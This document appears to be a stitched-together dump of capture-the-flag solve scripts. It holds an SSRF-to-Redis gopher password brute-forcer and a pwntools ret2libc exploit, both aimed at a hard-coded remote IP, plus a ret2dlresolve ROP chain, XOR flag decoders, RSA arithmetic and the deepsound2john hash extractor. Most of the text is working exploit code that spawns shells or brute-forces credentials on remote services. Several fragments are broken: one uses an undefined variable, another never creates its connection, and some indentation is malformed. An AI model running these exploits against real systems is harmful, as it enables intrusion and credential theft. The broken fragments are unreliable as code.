import hackhttp

hh = hackhttp.hackhttp()

url = "http://183.129.189.61:50400/index.php?url="
f=open("payload.txt","r")
while 1:
    line=f.readline()
    line=line.strip("\n")
    if not line:
        break
    #print line
    length=len(line)
    payload="gopher://127.0.0.1:6379/_%252A2%250d%250a%25244%250d%250aAUTH%250d%250a%2524"+str(length)+"%250d%250a"+line+"%250D%250A%252A1%250D%250A"
    code, head, body, redirect, log = hh.http(url+payload)
    if "OK"in body:
        print payload
        print "mima is "+line
        break

str = "[^L\\KYd'),{{&}/*}.}'}y-/(-){|.*&&*~z|-'b"
flag = ''
for i in str:
   flag = flag + chr(ord(i) ^ 31)
Print(flag)

from pwn import *

context.binary = "./ddstack"
ddstack = context.binary

p = remote('183.129.189.61', 52205)

libc = ELF('./libc-2.23.so')

puts_plt = ddstack.plt['puts']
puts_got = ddstack.got['puts']
pop1_ret = 0x804837d
vuln_addr = 0x8048520

p.recvuntil(b'\n')
p.sendline(b'\x00'*0x28+p32(0x500))

payload = b'\x00'*0x38+p32(puts_plt)+ p32(pop1_ret) + p32(puts_got) +p32(vuln_addr)
p.recvuntil(b'\n')
p.sendline(payload)
puts_libc_addr = u32(p.recv(4))
print('puts addr:'+hex(puts_libc_addr))
puts_libc_offset = libc.symbols['puts']
print(hex(puts_libc_offset))
libc_addr = puts_libc_addr - puts_libc_offset
print('lib base:'+hex(libc_addr))
ogg_addr = libc_addr + 0x3a81c
system_addr = libc_addr+libc.symbols['system']
binsh_addr = libc_addr + 0x0015910b
p.recvuntil(b'\n')
p.sendline(b'\x00'*0x28+p32(0x500))
payload = b'\x00'*0x38+p32(system_addr)+ p32(pop1_ret) + p32(binsh_addr) +p32(vuln_addr)
p.recvuntil(b'\n')
p.sendline(payload)
p.interactive()

from pwn import *
context.binary = "./pwn4"
pwn4 = context.binary
rop = ROP('./pwn4')
 
vuln_addr = 134513851
p.sendline(b'-5 65535')
p.sendline(b'4 134513851')
p.sendline(b'1 123456')
 
offset = 28
bss_addr = pwn4.bss()
 
stack_size = 0x800
base_stage = bss_addr + stack_size
rop.raw('a' * offset)
rop.read(0, base_stage, 100)
rop.migrate(base_stage)
p.sendline(rop.chain())
 
rop = ROP('./pwn4')
sh = "/bin/sh"
 
plt0 = pwn4.get_section_by_name('.plt').header.sh_addr
rel_plt = pwn4.get_section_by_name('.rel.plt').header.sh_addr
dynsym = pwn4.get_section_by_name('.dynsym').header.sh_addr
dynstr = pwn4.get_section_by_name('.dynstr').header.sh_addr
 
fake_sym_addr = base_stage + 32
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf)  # since the size of item(Elf32_Symbol) of dynsym is 0x10
fake_sym_addr = fake_sym_addr + align
index_dynsym = (fake_sym_addr - dynsym) // 0x10  # calculate the dynsym index of write
st_name = fake_sym_addr + 0x10 - dynstr
fake_write_sym = flat([st_name, 0, 0, 0x19])
 
index_offset = base_stage + 24 - rel_plt
fake_got = pwn4.got['__isoc99_scanf']
r_info = (index_dynsym << 8) | 0x7
fake_write_reloc = flat([fake_got, r_info])
 
rop.raw(plt0)
rop.raw(index_offset)
rop.raw('bbbb')
rop.raw(base_stage + 82)
rop.raw('bbbb')
rop.raw('bbbb')
rop.raw(fake_write_reloc)
rop.raw('a' * align) 
rop.raw(fake_write_sym)
rop.raw('system\x00')
rop.raw('a' * (80 - len(rop.chain())))
rop.raw(sh + '\x00')
rop.raw('a' * (100 - len(rop.chain())))
print(rop.chain())
p.sendline(rop.chain())
p.interactive()

import libnum
import gmpy2
n = [175244107616547332866730750185981814617957387479206131883327619678143859414917261557090068672641419524614082746718149196623832474591257254688029368786873659380810545544100093732206528310797663780323115004084293607571875376201003925886997130958845085335102862834229352381711568684829807273446043286026429784507]
c = [21584853678639373844706372673402978302367491374400753174448826706430954893731606437969950845160175905352220952818580141736392378203099462357081187525146295619472153677345050680091134337322577619625346776539480539709599567808902655164874470864640210333208364478253093461945151332942720768877894297441396061122]
e = 98
phi_n = n[0] - 1
print(gmpy2.gcd(e,phi_n0))
e_2 = e // 2
print(gmpy2.gcd(e_2,phi_n))
dd = gmpy2.invert(e_2,phi_n)
m2 = pow(c[0],dd,n[0])
m = gmpy2.iroot(m2,2)
print(m[0])
print(long_to_bytes(m[0]))

def a():
        flag = 'r1ght0us'
        flag = flag.upper()
        flag = flag[::-1]
        for i in  range(len(flag)):
                print(chr((ord(flag[i])+i)^(len(flag)-i)))

flag = '[cgjegl_&]!VW&KS_GVXHWI_EVCVDXGc^™mgrj' #res
	res = ''	
	for i in range(len(flag)):
		test = ord(flag[i])^(len(flag)-i)
		res += chr(test-i)
	print(res)
	print(res[::-1].lower())

#!/usr/bin/env python3
'''
deepsound2john extracts password hashes from audio files containing encrypted
data steganographically embedded by DeepSound (http://jpinsoft.net/deepsound/).
This method is known to work with files created by DeepSound 2.0.
Input files should be in .wav format. Hashes can be recovered from audio files
even after conversion from other formats, e.g.,
    ffmpeg -i input output.wav
Usage:
    python3 deepsound2john.py carrier.wav > hashes.txt
    john hashes.txt
This software is copyright (c) 2018 Ryan Govostes <rgovostes@gmail.com>, and
it is hereby released to the general public under the following terms:
Redistribution and use in source and binary forms, with or without
modification, are permitted.
'''

import logging
import os
import sys
import textwrap


def decode_data_low(buf):
  return buf[::2]

def decode_data_normal(buf):
  out = bytearray()
  for i in range(0, len(buf), 4):
    out.append((buf[i] & 15) << 4 | (buf[i + 2] & 15))
  return out

def decode_data_high(buf):
  out = bytearray()
  for i in range(0, len(buf), 8):
    out.append((buf[i] & 3) << 6     | (buf[i + 2] & 3) << 4 \
             | (buf[i + 4] & 3) << 2 | (buf[i + 6] & 3))
  return out


def is_magic(buf):
  # This is a more efficient way of testing for the `DSCF` magic header without
  # decoding the whole buffer
  return (buf[0] & 15)  == (68 >> 4) and (buf[2]  & 15) == (68 & 15) \
     and (buf[4] & 15)  == (83 >> 4) and (buf[6]  & 15) == (83 & 15) \
     and (buf[8] & 15)  == (67 >> 4) and (buf[10] & 15) == (67 & 15) \
     and (buf[12] & 15) == (70 >> 4) and (buf[14] & 15) == (70 & 15)


def is_wave(buf):
  return buf[0:4] == b'RIFF' and buf[8:12] == b'WAVE'


def process_deepsound_file(f):
  bname = os.path.basename(f.name)
  logger = logging.getLogger(bname)

  # Check if it's a .wav file
  buf = f.read(12)
  if not is_wave(buf):
    global convert_warn
    logger.error('file not in .wav format')
    convert_warn = True
    return
  f.seek(0, os.SEEK_SET)

  # Scan for the marker...
  hdrsz = 104
  hdr = None

  while True:
    off = f.tell()
    buf = f.read(hdrsz)
    if len(buf) < hdrsz: break

    if is_magic(buf):
          hdr = decode_data_normal(buf)
          logger.info('found DeepSound header at offset %i', off)
          break

    f.seek(-hdrsz + 1, os.SEEK_CUR)

  if hdr is None:
    logger.warn('does not appear to be a DeepSound file')
    return

  # Check some header fields
  mode = hdr[4]
  encrypted = hdr[5]

  modes = {2: 'low', 4: 'normal', 8: 'high'}
  if mode in modes:
    logger.info('data is encoded in %s-quality mode', modes[mode])
  else:
    logger.error('unexpected data encoding mode %i', modes[mode])
    return

  if encrypted == 0:
    logger.warn('file is not encrypted')
    return
  elif encrypted != 1:
    logger.error('unexpected encryption flag %i', encrypted)
    return

  sha1 = hdr[6:6+20]
  print('%s:$dynamic_1529$%s' % (bname, sha1.hex()))


if __name__ == '__main__':
  import argparse

  parser = argparse.ArgumentParser()
  parser.add_argument('--verbose', '-v', action='store_true')
  parser.add_argument('files', nargs='+', metavar='file',
    type=argparse.FileType('rb', bufsize=4096))
  args = parser.parse_args()

  if args.verbose:
    logging.basicConfig(level=logging.INFO)
  else:
    logging.basicConfig(level=logging.WARN)

  convert_warn = False

  for f in args.files:
    process_deepsound_file(f)

  if convert_warn:
    print(textwrap.dedent('''
    ---------------------------------------------------------------
    Some files were not in .wav format. Try converting them to .wav
    and try again. You can use: ffmpeg -i input output.wav
    ---------------------------------------------------------------
    '''.rstrip()), file=sys.stderr)